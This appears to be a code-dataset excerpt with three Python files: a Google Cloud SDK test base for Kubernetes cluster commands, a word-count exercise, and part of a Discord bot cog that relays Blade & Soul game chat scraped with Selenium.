policy.subnetworkName = kwargs['subnetworkName']\n if 'clusterIpv4Cidr' in kwargs:\n policy.clusterIpv4CidrBlock = kwargs['clusterIpv4Cidr']\n if 'nodeIpv4Cidr' in kwargs:\n policy.nodeIpv4CidrBlock = kwargs['nodeIpv4Cidr']\n if 'servicesIpv4Cidr' in kwargs:\n policy.servicesIpv4CidrBlock = kwargs['servicesIpv4Cidr']\n if 'tpuIpv4Cidr' in kwargs:\n policy.tpuIpv4CidrBlock = kwargs['tpuIpv4Cidr']\n if 'clusterSecondaryRangeName' in kwargs:\n policy.clusterSecondaryRangeName = kwargs['clusterSecondaryRangeName']\n if 'servicesSecondaryRangeName' in kwargs:\n policy.servicesSecondaryRangeName = kwargs['servicesSecondaryRangeName']\n return policy\n\n def _ServerConfig(self):\n return self.messages.ServerConfig(defaultClusterVersion=self.VERSION)\n\n def _MakeOperation(self, **kwargs):\n status = kwargs.get('errorMessage', kwargs.get('statusMessage'))\n return self.messages.Operation(\n statusMessage=status,\n name=kwargs.get('name', self.MOCK_OPERATION_ID),\n operationType=kwargs.get('operationType', self.op_create),\n status=kwargs.get('status', self.op_pending),\n targetLink=kwargs.get('targetLink', self.MOCK_TARGET_LINK),\n zone=kwargs.get('zone', self.ZONE),\n detail=kwargs.get('detail'),\n )\n\n def _MakeNodePoolOperation(self, **kwargs):\n status = kwargs.get('errorMessage', kwargs.get('statusMessage'))\n return self.messages.Operation(\n statusMessage=status,\n name=kwargs.get('name', self.MOCK_OPERATION_ID),\n operationType=kwargs.get('operationType', self.op_create),\n status=kwargs.get('status', self.op_pending),\n targetLink=kwargs.get('targetLink', self.MOCK_NODE_POOL_TARGET_LINK),\n zone=kwargs.get('zone', self.ZONE),\n )\n\n def _MakeComputeOperation(self, **kwargs):\n return self.compute_messages.Operation(\n statusMessage=kwargs.get('errorMessage'),\n name=kwargs.get('name', self.MOCK_OPERATION_ID),\n operationType=kwargs.get('operationType', 'update'),\n status=kwargs.get('status', self.compute_op_done),\n targetLink=kwargs.get('targetLink', self.MOCK_TARGET_LINK),\n zone=kwargs.get('zone', self.ZONE),\n )\n\n def _MakeInstanceGroupUrl(self, project, zone, cluster_name, pool_name=None):\n igm = cluster_name\n if pool_name:\n igm += '-' + pool_name\n return self.INSTANCE_GROUP_URL.format(project, zone, igm)\n\n def ExpectGetCluster(self, cluster, exception=None, zone=None):\n raise NotImplementedError('ExpectGetCluster is not overridden')\n\n def ExpectCreateCluster(self, cluster, response=None,\n exception=None, zone=None):\n raise NotImplementedError('ExpectCreateCluster is not overridden')\n\n def ExpectDeleteCluster(self, cluster_name, response=None,\n exception=None, zone=None):\n raise NotImplementedError('ExpectDeleteCluster is not overridden')\n\n def ExpectListClusters(self, clusters, zone=None, project_id=None,\n missing=None):\n raise NotImplementedError('ExpectListClusters is not overridden')\n\n def ExpectGetOperation(self, response, exception=None):\n raise NotImplementedError('ExpectGetOperation is not overridden')\n\n def ExpectListOperation(self, response, exception=None):\n raise NotImplementedError('ExpectListOperation is not overridden')\n\n def ExpectResize(self, cluster, size, ig):\n group = os.path.basename(ig)\n op = self._MakeComputeOperation(name='resize_' + group)\n self.mocked_compute_client_v1.instanceGroupManagers.Resize.Expect(\n self.compute_messages.ComputeInstanceGroupManagersResizeRequest(\n instanceGroupManager=group,\n project=self.PROJECT_ID,\n zone=cluster.zone,\n size=size),\n op)\n return op\n\n def ExpectResizeNodePool(self, node_pool_name, size, response=None,\n exception=None, zone=None):\n raise NotImplementedError('ExpectResizeNodePool is not overridden')\n\n def ExpectCreateNodePool(self,\n node_pool,\n response=None,\n exception=None,\n zone=None):\n raise NotImplementedError('ExpectCreateNodePool is not overridden')\n\n def ExpectGetNodePool(self, node_pool_id, response=None,\n exception=None, zone=None):\n raise NotImplementedError('ExpectGetNodePool is not overridden')\n\n def ExpectDeleteNodePool(self, node_pool_name, response=None,\n exception=None, zone=None):\n raise NotImplementedError('ExpectDeleteNodePool is not overridden')\n\n def ExpectUpdateNodePool(self,\n node_pool_name,\n node_management,\n response=None,\n exception=None,\n zone=None):\n raise NotImplementedError('ExpectUpdateNodePool is not overridden')\n\n def _MakeListNodePoolsResponse(self, node_pools):\n return self.messages.ListNodePoolsResponse(nodePools=node_pools)\n\n def ExpectListNodePools(self, project_id=None, response=None,\n exception=None, zone=None):\n raise NotImplementedError('ExpectListNodePools is not overridden')\n\n def ExpectRollbackOperation(self, node_pool_name, response=None,\n exception=None, zone=None):\n raise NotImplementedError('ExpectRollbackOperation is not overridden')\n\n def ExpectCancelOperation(self, op=None, exception=None):\n raise NotImplementedError('ExpectCancelOperation is not overridden')\n\n def ExpectSetLabels(self,\n cluster_name,\n resource_labels,\n fingerprint,\n response=None, zone=None):\n raise NotImplementedError('ExpectSetLabels is not overridden')\n\n def ExpectUpgradeCluster(self, cluster_name, update, response, location=None):\n raise NotImplementedError('ExpectUpgradeCluster is not overridden')\n\n def ExpectUpdateCluster(self, cluster_name, update, response):\n raise NotImplementedError('ExpectUpdateCluster is not overridden')\n\n def ExpectSetMasterAuth(self, cluster_name, action, update, response):\n raise NotImplementedError('ExpectSetMasterAuth is not overridden')\n\n def ExpectLegacyAbac(self, cluster_name, enabled, response):\n raise NotImplementedError('ExpectLegacyAbac is not overridden')\n\n def ExpectStartIpRotation(self, cluster_name, response=None, exception=None):\n raise NotImplementedError('ExpectStartIpRotation is not overridden')\n\n def ExpectCompleteIpRotation(self,\n cluster_name,\n response=None,\n exception=None):\n raise NotImplementedError('ExpectCompleteIpRotation is not overridden')\n\n def ExpectSetNetworkPolicy(self, cluster_name, enabled=True, response=None):\n raise NotImplementedError('ExpectSetNetworkPolicy is not overridden')\n\n def ExpectSetLoggingService(self,\n cluster_name,\n logging_service,\n response=None,\n exception=None):\n raise NotImplementedError('ExpectSetLoggingService is not overridden')\n\n def ExpectSetMaintenanceWindow(self,\n cluster_name,\n policy=None,\n response=None):\n raise NotImplementedError('ExpectSetMaintenanceWindow is not overridden')\n\n def ExpectGetServerConfig(self, location, exception=None):\n raise NotImplementedError('ExpectGetServerConfig is not overridden')\n\n\nclass GATestBase(TestBase):\n \"\"\"Mixin class for testing v1.\"\"\"\n API_VERSION = 'v1'\n\n # Sort the scopes to assert equality of the lists\n _DEFAULT_SCOPES = sorted([\n 'gke-version-default',\n 'https://www.googleapis.com/auth/devstorage.read_only',\n 'https://www.googleapis.com/auth/logging.write',\n 'https://www.googleapis.com/auth/monitoring',\n 'https://www.googleapis.com/auth/service.management.readonly',\n 'https://www.googleapis.com/auth/servicecontrol',\n 'https://www.googleapis.com/auth/trace.append',\n ])\n\n def SetUp(self):\n self.track = calliope_base.ReleaseTrack.GA\n\n def ExpectCreateCluster(self, cluster, response=None,\n exception=None, zone=None):\n if not zone:\n zone = self.ZONE\n self.mocked_client.projects_locations_clusters.Create.Expect(\n self.messages.CreateClusterRequest(\n cluster=cluster,\n parent=api_adapter.ProjectLocation(self.PROJECT_ID, zone)),\n response=response,\n exception=exception)\n\n def ExpectDeleteCluster(self,\n cluster_name,\n response=None,\n exception=None,\n zone=None):\n if not zone:\n zone = self.ZONE\n self.mocked_client.projects_locations_clusters.Delete.Expect(\n self.messages.ContainerProjectsLocationsClustersDeleteRequest(\n name=api_adapter.ProjectLocationCluster(\n self.PROJECT_ID, zone, cluster_name)),\n response=response,\n exception=exception)\n\n def ExpectGetCluster(self, cluster, exception=None, zone=None):\n if not zone:\n zone = self.ZONE\n if exception:\n response = None\n else:\n response = cluster\n self.mocked_client.projects_locations_clusters.Get.Expect(\n self.messages.ContainerProjectsLocationsClustersGetRequest(\n # use the response operation name/zone same as request\n name=api_adapter.ProjectLocationCluster(\n self.PROJECT_ID, zone, cluster.name)),\n response,\n exception=exception)\n\n def ExpectListClusters(self,\n clusters,\n zone=None,\n project_id=None,\n missing=None):\n if not project_id:\n project_id = self.PROJECT_ID\n if not zone:\n zone = '-'\n if not missing:\n missing = []\n self.mocked_client.projects_locations_clusters.List.Expect(\n self.messages.ContainerProjectsLocationsClustersListRequest(\n parent=api_adapter.ProjectLocation(project_id, zone)),\n self.messages.ListClustersResponse(\n clusters=clusters, missingZones=missing))\n\n def ExpectCreateNodePool(self,\n node_pool,\n response=None,\n exception=None,\n zone=None):\n if not zone:\n zone = self.ZONE\n self.mocked_client.projects_locations_clusters_nodePools.Create.Expect(\n self.messages.CreateNodePoolRequest(\n parent=api_adapter.ProjectLocationCluster(\n self.PROJECT_ID, zone, self.CLUSTER_NAME),\n nodePool=node_pool),\n response=response,\n exception=exception)\n\n # TODO(b/64575339) Make this work more like GetCluster (specifically, infer\n # node_pool_id from node_pool (response).\n def ExpectGetNodePool(self, node_pool_id, response=None,\n exception=None, zone=None):\n if not zone:\n zone = self.ZONE\n self.mocked_client.projects_locations_clusters_nodePools.Get.Expect(\n self.messages.ContainerProjectsLocationsClustersNodePoolsGetRequest(\n # use the response operation name/zone same as request\n name=api_adapter.ProjectLocationClusterNodePool(\n self.PROJECT_ID, zone, self.CLUSTER_NAME, node_pool_id)),\n response=response,\n exception=exception)\n\n def ExpectDeleteNodePool(self,\n node_pool_name,\n response=None,\n exception=None,\n zone=None):\n if not zone:\n zone = self.ZONE\n self.mocked_client.projects_locations_clusters_nodePools.Delete.Expect(\n self.messages.ContainerProjectsLocationsClustersNodePoolsDeleteRequest(\n name=api_adapter.ProjectLocationClusterNodePool(\n self.PROJECT_ID, zone, self.CLUSTER_NAME, node_pool_name)),\n response=response,\n exception=exception)\n\n def ExpectUpdateNodePool(self,\n node_pool_name,\n node_management,\n response=None,\n exception=None,\n zone=None):\n if not zone:\n zone = self.ZONE\n (self.mocked_client.projects_locations_clusters_nodePools.\n SetManagement.Expect(\n self.messages.SetNodePoolManagementRequest(\n name=api_adapter.ProjectLocationClusterNodePool(\n self.PROJECT_ID, zone, self.CLUSTER_NAME, node_pool_name),\n management=node_management),\n response=response,\n exception=exception))\n\n def ExpectListNodePools(self,\n response=None,\n exception=None,\n zone=None):\n if not zone:\n zone = self.ZONE\n self.mocked_client.projects_locations_clusters_nodePools.List.Expect(\n self.messages.ContainerProjectsLocationsClustersNodePoolsListRequest(\n parent=api_adapter.ProjectLocationCluster(\n self.PROJECT_ID, zone, self.CLUSTER_NAME)),\n response=response,\n exception=exception)\n\n def ExpectResizeNodePool(self, node_pool_name, size, response=None,\n exception=None, zone=None):\n if not zone:\n zone = self.ZONE\n req = self.messages.SetNodePoolSizeRequest(\n name=api_adapter.ProjectLocationClusterNodePool(\n self.PROJECT_ID, zone, self.CLUSTER_NAME, node_pool_name),\n nodeCount=size\n )\n self.mocked_client.projects_locations_clusters_nodePools.SetSize.Expect(\n req,\n response=response,\n exception=exception)\n\n def ExpectRollbackOperation(self, node_pool_name, response=None,\n exception=None, zone=None):\n if not zone:\n zone = self.ZONE\n self.mocked_client.projects_locations_clusters_nodePools.Rollback.Expect(\n self.messages.RollbackNodePoolUpgradeRequest(\n name=api_adapter.ProjectLocationClusterNodePool(\n self.PROJECT_ID, zone, self.CLUSTER_NAME, node_pool_name)),\n response=response,\n exception=exception)\n\n def ExpectGetOperation(self, response, exception=None):\n # use the response operation name/zone same as request\n req = self.messages.ContainerProjectsLocationsOperationsGetRequest(\n name=api_adapter.ProjectLocationOperation(\n self.PROJECT_ID, response.zone, response.name))\n if exception:\n response = None\n self.mocked_client.projects_locations_operations.Get.Expect(\n req, response=response, exception=exception)\n\n def ExpectListOperation(self, zone, response, exception=None):\n req = self.messages.ContainerProjectsLocationsOperationsListRequest(\n parent=api_adapter.ProjectLocation(self.PROJECT_ID, zone))\n if exception:\n response = None\n self.mocked_client.projects_locations_operations.List.Expect(\n req, response=response, exception=exception)\n\n def ExpectCancelOperation(self, op=None, exception=None):\n self.mocked_client.projects_locations_operations.Cancel.Expect(\n self.messages.CancelOperationRequest(\n name=api_adapter.ProjectLocationOperation(\n self.PROJECT_ID, self.ZONE, op.name)),\n response=self.messages.Empty(),\n exception=exception)\n\n def ExpectSetLabels(self,\n cluster_name,\n resource_labels,\n fingerprint,\n response=None, zone=None):\n if not zone:\n zone = self.ZONE\n self.mocked_client.projects_locations_clusters.SetResourceLabels.Expect(\n self.messages.SetLabelsRequest(\n name=api_adapter.ProjectLocationCluster(\n self.PROJECT_ID, zone, cluster_name),\n resourceLabels=resource_labels,\n labelFingerprint=fingerprint),\n response)\n\n def ExpectUpgradeCluster(self, cluster_name, update, response, location=None):\n if not location:\n location = self.ZONE\n self.mocked_client.projects_locations_clusters.Update.Expect(\n self.msgs.UpdateClusterRequest(\n name=api_adapter.ProjectLocationCluster(\n self.PROJECT_ID, location, cluster_name),\n update=update),\n response=response)\n\n def ExpectUpdateCluster(self, cluster_name, update, response):\n self.mocked_client.projects_locations_clusters.Update.Expect(\n self.msgs.UpdateClusterRequest(\n name=api_adapter.ProjectLocationCluster(\n self.PROJECT_ID, self.ZONE, cluster_name),\n update=update),\n response=response)\n\n def ExpectSetMasterAuth(self,\n cluster_name,\n action,\n update,\n response=None,\n exception=None):\n self.mocked_client.projects_locations_clusters.SetMasterAuth.Expect(\n self.msgs.SetMasterAuthRequest(\n name=api_adapter.ProjectLocationCluster(\n self.PROJECT_ID, self.ZONE, cluster_name),\n action=action,\n update=update),\n response=response,\n exception=exception)\n\n def ExpectLegacyAbac(self, cluster_name, enabled, response):\n self.mocked_client.projects_locations_clusters.SetLegacyAbac.Expect(\n self.msgs.SetLegacyAbacRequest(\n name=api_adapter.ProjectLocationCluster(\n self.PROJECT_ID, self.ZONE, cluster_name),\n enabled=enabled),\n response=response)\n\n def ExpectStartIpRotation(self,\n cluster_name,\n rotate_credentials=False,\n response=None,\n exception=None):\n self.mocked_client.projects_locations_clusters.StartIpRotation.Expect(\n self.msgs.StartIPRotationRequest(\n name=api_adapter.ProjectLocationCluster(self.PROJECT_ID, self.ZONE,\n cluster_name),\n rotateCredentials=rotate_credentials),\n response=response,\n exception=exception)\n\n def ExpectCompleteIpRotation(self,\n cluster_name,\n response=None,\n exception=None):\n self.mocked_client.projects_locations_clusters.CompleteIpRotation.Expect(\n self.msgs.CompleteIPRotationRequest(\n name=api_adapter.ProjectLocationCluster(\n self.PROJECT_ID, self.ZONE, cluster_name)),\n response=response,\n exception=exception)\n\n def ExpectSetNetworkPolicy(self, cluster_name, enabled=True, response=None):\n self.mocked_client.projects_locations_clusters.SetNetworkPolicy.Expect(\n self.msgs.SetNetworkPolicyRequest(\n name=api_adapter.ProjectLocationCluster(\n self.PROJECT_ID, self.ZONE, cluster_name),\n networkPolicy=self.msgs.NetworkPolicy(\n enabled=enabled,\n provider=self.msgs.NetworkPolicy.\n ProviderValueValuesEnum.CALICO)),\n response=response)\n\n def ExpectSetLoggingService(self,\n cluster_name,\n logging_service,\n response=None,\n exception=None):\n self.mocked_client.projects_locations_clusters.SetLogging.Expect(\n self.msgs.SetLoggingServiceRequest(\n name=api_adapter.ProjectLocationCluster(\n self.PROJECT_ID, self.ZONE, cluster_name),\n loggingService=logging_service),\n response=response,\n exception=exception)\n\n def ExpectSetMaintenanceWindow(self, cluster_name, policy=None,\n response=None):\n self.mocked_client.projects_locations_clusters.SetMaintenancePolicy.Expect(\n self.msgs.SetMaintenancePolicyRequest(\n name=api_adapter.ProjectLocationCluster(self.PROJECT_ID,\n self.ZONE,\n cluster_name),\n maintenancePolicy=policy),\n response=response)\n\n def ExpectGetServerConfig(self, location, exception=None):\n if exception:\n response = None\n else:\n response = self.messages.ServerConfig(\n buildClientInfo='changelist 12345', defaultClusterVersion='1.2.3',\n validMasterVersions=['1.3.2'])\n self.mocked_client.projects_locations.GetServerConfig.Expect(\n self.messages.ContainerProjectsLocationsGetServerConfigRequest(\n name=api_adapter.ProjectLocation(self.PROJECT_ID, location)),\n response=response,\n exception=exception)\n\n\nclass BetaTestBase(GATestBase):\n \"\"\"Mixin class for testing v1beta1.\"\"\"\n API_VERSION = 'v1beta1'\n\n # Sort the scopes to assert equality of the lists\n _DEFAULT_SCOPES = sorted([\n 'https://www.googleapis.com/auth/devstorage.read_only',\n 'https://www.googleapis.com/auth/logging.write',\n 'https://www.googleapis.com/auth/monitoring',\n 'https://www.googleapis.com/auth/service.management.readonly',\n 'https://www.googleapis.com/auth/servicecontrol',\n 'https://www.googleapis.com/auth/trace.append',\n ])\n\n def SetUp(self):\n self.track = calliope_base.ReleaseTrack.BETA\n\n def _MakeCluster(self, **kwargs):\n cluster = GATestBase._MakeCluster(self, **kwargs)\n cluster.auditConfig = kwargs.get('auditConfig')\n cluster.binaryAuthorization = kwargs.get('binaryAuthorization')\n cluster.enableTpu = kwargs.get('enableTpu')\n cluster.autoscaling = kwargs.get('clusterAutoscaling')\n cluster.verticalPodAutoscaling = kwargs.get('verticalPodAutoscaling')\n return cluster\n\n def _MakeNodePool(self, **kwargs):\n node_pool = GATestBase._MakeNodePool(self, **kwargs)\n node_pool.config.workloadMetadataConfig = kwargs.get(\n 'workloadMetadataConfig')\n return node_pool\n\n def _MakeIPAllocationPolicy(self, **kwargs):\n policy = GATestBase._MakeIPAllocationPolicy(self, **kwargs)\n if 'allowRouteOverlap' in kwargs:\n policy.allowRouteOverlap = kwargs.get('allowRouteOverlap')\n return policy\n\n\nclass AlphaTestBase(BetaTestBase):\n \"\"\"Mixin class for testing v1alpha1.\"\"\"\n API_VERSION = 'v1alpha1'\n\n def SetUp(self):\n self.track = calliope_base.ReleaseTrack.ALPHA\n\n def _MakeCluster(self, **kwargs):\n cluster = super(AlphaTestBase, self)._MakeCluster(**kwargs)\n cluster.enableTpu = kwargs.get('enableTpu')\n cluster.defaultMaxPodsConstraint = kwargs.get('defaultMaxPodsConstraint')\n return cluster\n\n def _MakeNodePool(self, **kwargs):\n node_pool = BetaTestBase._MakeNodePool(self, **kwargs)\n if kwargs.get('localSsdVolumeConfigs') is not None:\n node_pool.config.localSsdVolumeConfigs = kwargs.get(\n 'localSsdVolumeConfigs')\n node_pool.maxPodsConstraint = kwargs.get('maxPodsConstraint')\n node_pool.config.sandboxConfig = kwargs.get('sandboxConfig')\n return node_pool\n\n def _MakeUsableSubnet(self, **kwargs):\n # cluster.auditConfig = kwargs.get('auditConfig')\n # Construct the default pool, if we don't have any passed in. We\n # can't know all the possible permutations, so any tests involving\n # multiple nodepools must construct them prior to _MakeCluster.\n # if kwargs.get('nodePools') is None:\n # pool = self._MakeDefaultNodePool(**kwargs)\n # kwargs['nodePools'] = [pool]\n # kwargs['instanceGroupUrls'] = pool.instanceGroupUrls\n network = resources.REGISTRY.Create('compute.networks',\n project=self.PROJECT_ID,\n network=kwargs.get('network'))\n subnetwork = resources.REGISTRY.Create('compute.subnetworks',\n project=self.PROJECT_ID,\n region=self.REGION,\n subnetwork=kwargs.get('subnetwork'))\n return self.messages.UsableSubnetwork(\n subnetwork=subnetwork.RelativeName(),\n network=network.RelativeName(),\n ipCidrRange=kwargs.get('ipCidrRange')\n )\n\n def _MakeListUsableSubnetworksResponse(self, subnets):\n return self.messages.ListUsableSubnetworksResponse(subnetworks=subnets)\n\n def _ExpectListUsableSubnets(self, response, exception=None):\n req = self.messages.ContainerProjectsAggregatedUsableSubnetworksListRequest(\n parent=self.PROJECT_REF.RelativeName(),\n pageSize=500,\n filter='')\n if exception:\n response = None\n self.mocked_client.projects_aggregated_usableSubnetworks.List.Expect(\n req, response=response, exception=exception)\n\n\nclass IntegrationTestBase(\n e2e_base.WithServiceAuth,\n sdk_test_base.WithOutputCapture):\n \"\"\"Base class for container integration tests.\"\"\"\n\n REGION = 'us-central1'\n ZONE = 'us-central1-f'\n\n def TearDown(self):\n if not hasattr(self, 'cluster_name'):\n return\n try:\n log.status.Print('Attempting to cleaning up %s', self.cluster_name)\n # Make cluster deletion asynchronized until gcloud can allow a timeout\n # longer than 20 minutes.\n self.Run('container clusters delete {0} --zone={1} --async -q'\n .format(self.cluster_name, self.ZONE))\n except core_exceptions.Error as error:\n log.status.Print('Failed to delete %s:\\n%s', self.cluster_name, error)\n try:\n log.status.Print('Attempting to cleaning up %s', self.cluster_name)\n # Make cluster deletion asynchronized until gcloud can allow a timeout\n # longer than 20 minutes.\n self.Run('container clusters delete {0} --region={1} --async -q'\n .format(self.cluster_name, self.REGION))\n except core_exceptions.Error as error:\n log.status.Print('Failed to delete %s:\\n%s', self.cluster_name, error)\n\n def _GetLocationFlag(self, location):\n \"\"\"Produce location flag for a given location.\"\"\"\n if location == self.ZONE:\n return '--zone={0}'.format(self.ZONE)\n elif location == self.REGION:\n return '--region={0}'.format(self.REGION)\n raise ValueError('Broken test - location unknown to the test util.')\n\n def CleanupLeakedClusters(self, location, track):\n \"\"\"Cleanup leaked clusters that are older than 3 hours.\"\"\"\n # TODO(b/109872728): improve how we handle leaked clusters.\n # Creating a cluster may timeout in the test, but the creation may\n # eventually succeed. This causes the cluster leaked. Too many leaked\n # clusters will prevent future cluster creation due to lack of quota.\n # When there are no leaked clusters, that cleanup operations are just NOOP.\n # We cleanup leaked clusters that are older than 3 hours.\n leaked_cluster_min_age = datetime.timedelta(hours=3)\n output = self.Run(\n 'container clusters list {0}'.format(self._GetLocationFlag(location)),\n track=track)\n jsonoutput = encoding.MessageToJson(output)\n clusters = json.loads(jsonoutput)\n for cluster in clusters:\n createtime = cluster['createTime']\n dt1 = parser.parse(createtime)\n dt2 = dt1 + leaked_cluster_min_age\n dt3 = datetime.datetime.utcnow().replace(tzinfo=tz.tzutc()) # pylint: disable=g-tzinfo-replace\n if dt2 < dt3:\n self.Run(\n 'container clusters delete {0} {1} -q --async'.format(\n cluster['name'], self._GetLocationFlag(location)),\n track=track)\n log.status.Print('Deleting a leaked cluster: %s', cluster['name'])\n\n\nclass ClustersTestBase(UnitTestBase):\n \"\"\"Base class for clusters command tests.\"\"\"\n\n def SetUp(self):\n self.clusters_command_base = self.COMMAND_BASE + ' clusters --zone {0}'\n self.regional_clusters_command_base = (self.COMMAND_BASE +\n ' clusters --region {0}')\n kubeconfig_path = kconfig.Kubeconfig.DefaultPath()\n if os.path.exists(kubeconfig_path):\n os.unlink(kubeconfig_path)\n self.msgs = core_apis.GetMessagesModule('container', self.API_VERSION)\n self._PatchSDKBinPath()\n\n\nclass NodePoolsTestBase(UnitTestBase):\n \"\"\"Base class for node-pools command tests.\"\"\"\n\n def SetUp(self):\n self.node_pools_command_base = self.COMMAND_BASE + ' node-pools --zone {0}'\n self.regional_node_pools_command_base = (self.COMMAND_BASE +\n ' node-pools --region {0}')\n kubeconfig_path = kconfig.Kubeconfig.DefaultPath()\n if os.path.exists(kubeconfig_path):\n os.unlink(kubeconfig_path)\n self.msgs = core_apis.GetMessagesModule('container', self.API_VERSION)\n\n def HttpError(self):\n return http_error.MakeHttpError(\n 400, 'your request is bad and you should feel bad.',\n url='https://fake-url.io')\n\n\nclass OperationsTestBase(UnitTestBase):\n \"\"\"Base class for operations command tests.\"\"\"\n\n def SetUp(self):\n self.operations_command_base = self.COMMAND_BASE + ' operations'\n self.msgs = core_apis.GetMessagesModule('container', self.API_VERSION)\n\n\nclass GetServerConfigTestBase(UnitTestBase):\n \"\"\"Base class for get-server-config command tests.\"\"\"\n\n def SetUp(self):\n self.get_server_config_command_base = (self.COMMAND_BASE +\n ' get-server-config')\n self.msgs = core_apis.GetMessagesModule('container', self.API_VERSION)\n\n\nclass SubnetsTestBase(UnitTestBase):\n \"\"\"Base class for subnets command tests.\"\"\"\n\n def SetUp(self):\n self.subnets_command_base = self.COMMAND_BASE + ' subnets'\n self.msgs = core_apis.GetMessagesModule('container', self.API_VERSION)\n","sub_path":"google-cloud-sdk/lib/tests/lib/surface/container/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":44946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"320089477","text":"import re\n\ndef word_count(phrase):\n\t\"\"\" \n\tGiven a phrase, counts the occurrences of each word in that phrase.\n\t\"\"\"\n\n\tphrase = re.sub('[^0-9a-zA-Z]+', ' ', phrase.lower())\n\tword_list = phrase.split()\n\tword_dict = dict([ (word, word_list.count(word)) for word in word_list ])\n\t\n\treturn word_dict\n","sub_path":"exercism/word_count.py","file_name":"word_count.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"333542407","text":"from typing import Literal, Optional\r\nimport json\r\nimport logging\r\nimport asyncio\r\nimport hashlib\r\n\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.remote.command import Command\r\n\r\nimport discord\r\nfrom redbot.core import commands\r\nfrom redbot.core.bot import Red\r\nfrom redbot.core.config import Config\r\n\r\nRequestType = Literal[\"discord_deleted_user\", \"owner\", \"user\", \"user_strict\"]\r\nlog = logging.getLogger(\"red.eunsah-cogs.twBNSchat\")\r\n\r\n\r\nclass twBNSchat(commands.Cog):\r\n \"\"\"\r\n Fetch Taiwan Blade&Soul f8 chat\r\n ---\r\n For any issues about this cog\r\n Contact me via ba#0373\r\n \"\"\"\r\n\r\n def __init__(self, bot: Red) -> None:\r\n self.bot = bot\r\n self._sync = False\r\n self._enabled = True\r\n # self._status = ('-', '-')\r\n self.driver = None\r\n self._cached_messages = []\r\n\r\n self.config = Config.get_conf(\r\n self,\r\n identifier=164900704526401545021,\r\n force_registration=True,\r\n )\r\n\r\n default_guild = {\r\n \"channel\": None,\r\n \"toggle\": False,\r\n }\r\n\r\n default_global = {\r\n \"accountA\": None,\r\n \"accountB\": None,\r\n # \"timestamp\" : None,\r\n # \"url\": \"\",\r\n }\r\n\r\n self.config.register_guild(**default_guild)\r\n self.config.register_global(**default_global)\r\n\r\n # bot.loop.create_task(self.initialize())\r\n\r\n async def red_delete_data_for_user(\r\n self, *, requester: RequestType, user_id: int\r\n ) -> None:\r\n super().red_delete_data_for_user(requester=requester, user_id=user_id)\r\n\r\n def cog_unload(self):\r\n log.debug(\"Unloading twBNSchat...\")\r\n self._enabled = False\r\n if self._sync:\r\n self._sync.cancel()\r\n self.driver.quit()\r\n log.debug(\"Stopped selenium.\")\r\n log.debug(\"twBNSchat unloaded.\")\r\n\r\n async def initialize(self):\r\n await self.bot.wait_until_red_ready()\r\n\r\n driver_options = webdriver.ChromeOptions()\r\n driver_options.add_argument(\"--mute-audio\")\r\n driver_options.add_experimental_option(\"excludeSwitches\", [\"enable-logging\"])\r\n driver_options.add_argument(\"--disable-extensions\")\r\n driver_options.add_argument(\"--disable-gpu\")\r\n driver_options.add_argument(\"--disable-dev-shm-usage\")\r\n driver_options.add_argument(\"--no-sandbox\")\r\n driver_options.headless = True\r\n\r\n driver_caps = webdriver.DesiredCapabilities.CHROME.copy()\r\n driver_caps[\"goog:loggingPrefs\"] = {\"performance\": \"ALL\"}\r\n\r\n log.debug(\"Initializing selenium...\")\r\n\r\n try:\r\n self.driver = webdriver.Chrome(\r\n options=driver_options,\r\n desired_capabilities=driver_caps,\r\n executable_path=r\"/home/qenu_dev/bin/chromedriver\",\r\n )\r\n except Exception as err:\r\n await self.test_send(f\"Webdriver Error: {err}\")\r\n\r\n try:\r\n self.driver.get(\r\n \"https://a90ur5.github.io/twBNS_F8ChattingChannel/web/index.html\"\r\n )\r\n except Exception as err:\r\n await self.test_send(f\"Driver get Error: {err}\")\r\n \r\n if self.driver:\r\n self._sync = self.bot.loop.create_task(self.start_fetch())\r\n\r\n async def start_fetch(self):\r\n # await self.test_send(\"start\")\r\n await self.bot.wait_until_red_ready()\r\n while self._enabled:\r\n # await self.test_send(\"twbnschat requesting...\")\r\n await self.websocket_fetch()\r\n await asyncio.sleep(6.4)\r\n\r\n async def websocket_fetch(self):\r\n announce_queue = []\r\n log = self.driver.get_log(\"performance\")\r\n\r\n if 10 < len(log) or len(log) <= 0:\r\n return\r\n\r\n output = False\r\n\r\n for wsData in log:\r\n\r\n try:\r\n wsJson = json.loads(wsData[\"message\"])\r\n if (\r\n wsJson[\"message\"][\"method\"] == \"Network.webSocketFrameReceived\"\r\n and wsJson[\"message\"][\"params\"][\"response\"][\"payloadData\"][0] == \"4\"\r\n ):\r\n wsParsed = json.loads(\r\n wsJson[\"message\"][\"params\"][\"response\"][\"payloadData\"][2:]\r\n )\r\n # await self.test_send(f\"processed log: {wsParsed}\")\r\n if wsParsed[0] == \"getStatus\":\r\n # await self.test_send(\"got status\")\r\n await self.config.accountA.set(wsParsed[1][\"accountA\"])\r\n await self.config.accountB.set(wsParsed[1][\"accountB\"])\r\n return\r\n if wsParsed[0] == \"getInquiry\":\r\n # await self.test_send(\"got inquiry\")\r\n announce_queue.append(wsParsed[1])\r\n output = True\r\n except Exception:\r\n pass\r\n if output:\r\n await self.text_announce(announce_queue)\r\n\r\n async def channel_announce(self, data: dict):\r\n\r\n config = await self.config.all_guilds()\r\n\r\n guild_queue = [\r\n guild_id for guild_id in config if config[guild_id][\"toggle\"] is True\r\n ]\r\n if not len(guild_queue):\r\n return\r\n\r\n if self.in_cached(data[\"player\"] + \"|\" + data[\"msg\"]):\r\n return\r\n\r\n embed = discord.Embed(\r\n title=data[\"player\"],\r\n description=data[\"msg\"],\r\n color=self.string2discordColor(data[\"player\"]),\r\n )\r\n embed.set_footer(text=data[\"time\"])\r\n\r\n for guild_id in guild_queue:\r\n try:\r\n guild = self.bot.get_guild(guild_id)\r\n channel = guild.get_channel(int(config[guild_id][\"channel\"]))\r\n await channel.send(embed=embed)\r\n except Exception:\r\n pass\r\n\r\n async def text_announce(self, data_l: list):\r\n\r\n config = await self.config.all_guilds()\r\n\r\n guild_queue = [\r\n guild_id for guild_id in config if config[guild_id][\"toggle\"] is True\r\n ]\r\n if not len(guild_queue):\r\n return\r\n\r\n data_l = [\r\n data\r\n for data in data_l\r\n if not self.in_cached(data[\"player\"] + \"|\" + data[\"msg\"])\r\n 